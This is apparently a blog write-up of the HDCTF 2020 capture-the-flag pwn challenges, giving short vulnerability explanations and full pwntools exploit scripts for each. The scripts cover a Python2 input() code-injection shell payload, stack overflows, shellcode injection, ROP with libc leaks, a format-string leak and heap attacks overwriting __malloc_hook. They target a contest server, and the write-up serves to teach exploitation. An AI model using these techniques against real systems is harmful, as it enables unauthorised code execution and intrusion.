• HDCTF 2020 Writeup


    国庆在家摸鱼,听到同学说有这个海南大学举办的比赛,于是就来随便玩了玩 摸鱼日记
    总体难度并不大,pwn题的考点都比较基础和常规,可以作为一个基础知识的回顾与熟悉

    Writeup

    pwn

    calculator

    漏洞点:使用了python2中的input函数,导致了任意代码执行

    payload:

    __import__('os').system("/bin/sh")
    

    即可get shell

    warmup

    题目需要输入一个int型数据使得abs(v4)<0

    我们只需输入最小的整数即可get shell 输入-231 即-2147483648

    backdoor

    简单的栈溢出,有后门,直接溢出到后门函数即可

    exp:

    from pwn import *
    p= remote('39.107.127.44',10002)
    p.recvuntil('name:')
    backdoor = 0x400697
    payload = 'a'*0xA+'a'*8+p64(backdoor)
    p.send(payload)
    p.interactive()
    

    pwnme

    没有开NX,有RWX的段并且可以往bss段上写数据,在bss段上写入shellcode,然后栈溢出返回地址到shellcode处即可

    exp:

    from pwn import*
    p = remote('39.107.127.44',10006)
    #p=process('./pwnme')
    elf=ELF('./pwnme')
    context(os='linux',arch='amd64',log_level='debug')
    shellcode = asm(shellcraft.sh())
    p.recvuntil('Name:')
    p.send(shellcode)
    payload='a'*40+p64(0x601080)
    p.recvuntil('Try your best:')
    p.sendline(payload)
    p.interactive()
    

    babyrop

    通过puts泄露libc基址,然后rop打one_gadget

    exp:

    from pwn import*
    p = process('./babyrop')
    #ip = '39.107.127.44' 
    #port ='10001'
    p = remote('39.107.127.44',10001)
    elf = ELF('./babyrop')
    libc = ELF('./libc-2.23-64.so')
    main = 0x400617 
    puts_plt = elf.plt['puts']
    puts_got = elf.got['puts']
    pop_rdi = 0x4006d3
    p.recvuntil('Your input :')
    payload = 'a'*0x28+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
    p.send(payload)
    puts_add = u64(p.recv(6).ljust(8,'x00'))
    libc_base = puts_add - libc.symbols['puts']
    log.info('puts:'+hex(puts_add))
    log.info('libc_base:'+hex(libc_base))
    one = libc_base + 0xf0364
    p.recvuntil('Your input :')
    payload = 'a'*0x28 + p64(one)
    p.sendline(payload)
    p.interactive()
    

    echo

    printf存在格式化字符串漏洞,flag被读到了栈上,利用格式化字符串将flag打印出来即可。

    经过调试,得到flag在%27$p

    %37$p 的位置上

    每一项读出来十六进制转字符后逆序,最后全部拼接起来即可

    exp:

    from pwn import*
    p = remote('39.107.127.44',10004)
    flag = ""
    def leak(index):
        p.recvuntil('>')
        payload = '%'+str(index)+'$'+'p'
        p.sendline(payload)
        answer = p.recvuntil('
    ')[:-1]
        b = int(answer,16)
        answer = p64(b)[:4]
        return answer 
    
    for i in range(27,38):
        flag += leak(i)
     
    print flag
    

    easyheap

    存在UAF漏洞,利用unsorted bin泄露libc基址,然后fastbin attack 打 mallochook

    exp:

    from pwn import *
    #p = process('./easyheap')
    p = remote('39.107.127.44',10003)
    libc = ELF('./libc-2.23.so')
    #context.log_level='debug'
    def add(id,size,content):
        p.sendlineafter('Your choice :','1')
        p.sendlineafter('id:',str(id))
        p.sendlineafter('size:',str(size))
        p.sendafter('content:',content)
    
    def edit(id,content):
        p.sendlineafter('Your choice :','2')
        p.sendlineafter('id:',str(id))
        p.sendafter('content:',content)
    
    def delete(id):
        p.sendlineafter('Your choice :','3')
        p.sendlineafter('id:',str(id))
    
    def show(id):
        p.sendlineafter('Your choice :','4')
        p.sendlineafter('id:',str(id))
    
    add(0,0x90,'aaaa')
    add(1,0x90,'bbbb')
    delete(0)
    #gdb.attach(p)
    show(0)
    p.recvline()
    main_arena = u64(p.recv(6).ljust(8,'x00')) - 88
    libc_base = main_arena-0x10-libc.sym['__malloc_hook']
    log.info('libc_base:%x',libc_base)
    malloc_hook=libc_base+libc.sym['__malloc_hook']
    log.info('fake:0x%x',malloc_hook-0x23)
    one = libc_base + 0x4527a
    add(2,0x60,'cccc')
    add(3,0x60,'dddd')
    delete(2)
    edit(2,p64(malloc_hook-0x23))
    add(4,0x60,'eeee')
    add(5,0x60,'x00'*0x13+p64(one))
    #gdb.attach(p)
    p.sendlineafter('Your choice :','1')
    p.sendlineafter('id:',str(6))
    p.sendlineafter('size:',str(0x10))
    p.interactive()
    

    babyheap

    存在堆溢出漏洞,unsorted bin泄露地址,fastbin attack 打malloc hook

    exp:

    from pwn import *
    p = process('./babyheap')
    p = remote('39.107.127.44',10000)
    libc = ELF('./libc-2.23.so')
    #context.log_level='debug'
    def add(id,size,content):
        p.sendlineafter('Your choice :','1')
        p.sendlineafter('id:',str(id))
        p.sendlineafter('size:',str(size))
        p.sendafter('content:',content)
    
    def edit(id,size,content):
        p.sendlineafter('Your choice :','2')
        p.sendlineafter('id:',str(id))
        p.sendlineafter('size:',str(size))
        p.sendafter('content:',content)
    
    def delete(id):
        p.sendlineafter('Your choice :','3')
        p.sendlineafter('id:',str(id))
    
    def show(id):
        p.sendlineafter('Your choice :','4')
        p.sendlineafter('id:',str(id))
    add(0,0x90,'aaaa')
    add(1,0x90,'bbbb')
    delete(0)
    #gdb.attach(p)
    add(2,0x50,'c'*8)
    #gdb.attach(p)
    show(2)
    p.recvuntil('c'*8)
    main_arena = u64(p.recv(6).ljust(8,'x00')) - ( 0xc08 - 0xb78) -88
    log.info('main_arena:%x',main_arena)
    #gdb.attach(p)
    malloc_hook = main_arena - 0x10
    libc_base = main_arena - 0x10 -libc.sym['__malloc_hook']
    one = libc_base + 0x4527a
    log.info('fake:0x%x',malloc_hook-0x23)
    add(3,0x60,'dddd')
    add(4,0x60,'eeee')
    add(5,0x60,'ffff')
    delete(4)
    #gdb.attach(p)
    edit(3,0x80,'x00'*0x68+p64(0x71)+p64(malloc_hook-0x23))
    add(6,0x60,'gggg')
    add(7,0x60,'x00'*0x13+p64(one))
    #gdb.attach(p)
    p.sendlineafter('Your choice :','1')
    p.sendlineafter('id:',str(8))
    p.sendlineafter('size:',str(0x10))
    p.interactive()
    

    hardheap

    edit函数存在off-by-one漏洞,溢出1字节,先通过unsorted bin泄露libc地址

    再通过off-by-one造成块堆叠,制造fastbin attack,打malloc hook

    exp:

    from pwn import *
    #p = process('./hardheap')
    p = remote('39.107.127.44',10005)
    libc = ELF('./libc-2.23.so')
    #context.log_level='debug'
    def add(id,size,content):
        p.sendlineafter('Your choice :','1')
        p.sendlineafter('id:',str(id))
        p.sendlineafter('size:',str(size))
        p.sendafter('content:',content)
    
    def edit(id,content):
        p.sendlineafter('Your choice :','2')
        p.sendlineafter('id:',str(id))
        p.sendafter('content:',content)
    
    def delete(id):
        p.sendlineafter('Your choice :','3')
        p.sendlineafter('id:',str(id))
    def show(id):
        p.sendlineafter('Your choice :','4')
        p.sendlineafter('id:',str(id))
    
    add(0,0x90,'aaaa')
    add(1,0x18,'bbbb')
    delete(0)
    add(2,0x50,'c'*8)
    show(2)
    p.recvuntil('c'*8)
    main_arena = u64(p.recv(6).ljust(8,'x00')) - ( 0xc08 - 0xb78) -88
    log.info('main_arena:0x%x',main_arena)
    #gdb.attach(p)
    malloc_hook = main_arena - 0x10
    libc_base = main_arena - 0x10 -libc.sym['__malloc_hook']
    log.info('fake:0x%x',malloc_hook-0x23)
    one = libc_base + 0x4527a
    add(3,0x30,'dddd')
    add(4,0x18,'eeee')
    add(5,0x60,'ffff')
    add(6,0x18,'gggg')
    edit(1,'x00'*0x18+p8(0x91))
    delete(4)
    add(7,0x80,'hhhh')
    delete(5)
    edit(7,'x00'*0x18+p64(0x71)+p64(malloc_hook-0x23))
    add(8,0x60,'iiii')
    add(9,0x60,'x00'*0x13+p64(one))
    #gdb.attach(p)
    p.sendlineafter('Your choice :','1')
    p.sendlineafter('id:',str(10))
    p.sendlineafter('size:',str(0x10))
    p.interactive()
    
  • 相关阅读:
    开发新手最容易犯的50个 Ruby on Rails 错误(1)
    Spring Data Redis 让 NoSQL 快如闪电(2)
    为什么每个程序员都应该懂点前端知识?
    如何在 Flickr 上找到又酷,又有趣,且版权自由的照片?
    微服务扩展新途径:Messaging
    为什么现代企业无法真正实现组合式监控?
    开发者和程序员需要关注的42个播客
    战略性情绪分析的5大数据来源
    Spring Data Redis 让 NoSQL 快如闪电 (1)
    对抗告警疲劳的8种方法
  • 原文地址:https://www.cnblogs.com/z2yh/p/13771942.html
Copyright © 2020-2023  润新知